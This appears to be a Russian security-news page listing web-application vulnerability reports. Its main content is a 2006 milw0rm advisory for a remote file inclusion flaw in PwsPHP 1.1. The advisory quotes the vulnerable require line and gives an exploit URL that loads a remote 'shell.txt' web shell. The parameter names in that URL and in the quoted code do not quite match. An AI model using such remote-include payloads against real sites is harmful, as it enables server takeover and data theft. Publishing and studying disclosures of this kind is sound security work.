Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

[SA22607] Hosting Controller Multiple Vulnerabilities

[Full-disclosure] Cross Site Scripting (XSS) Vulnerability in Web Mail platform by "Mirapoint"

[Full-disclosure] Cross Site Scripting (XSS) Vulnerability in "ViewImage. asp" by Daronet Internet Solutions

[Full-disclosure] Cross Site Scripting (XSS) Vulnerability in Netquery by "VIRtech"

From:	MILW0RM <submit_(at)_milw0rm.com>
Date:	2 ноября 2006 г.
Subject:	PwsPHP <= 1.1 (themes/fin.php) Remote File Include Vulnerablity

=================================================================================
=========================================
PwsPHP v1.1 (theme) File inclusion Vulnerablity
===============================================
Script:PwsPHP
=============
Version:1.1
=============
script site:http://www.pwsphp.com
=================================
Author:Dr Max Virus
=======================================
Bug in;
themes/fin.php
==============
Vul Code:
require ("$theme/fin.php")
==========================
Exploit:
www.victim.com/script_path/themes/fin.php?themes=shell.txt?
===========================================================
Gr33Ts:str0ke-the master-Thehacker-NETTOXIC-ShiKAa-xoron-0xygen-All Ayyildiz
Team-All My Friends
=================================================================================
===============
http://www.comscripts.com/scripts/php.pwsphp.1517.html
=================================================================================
===============

# milw0rm.com [2006-10-31]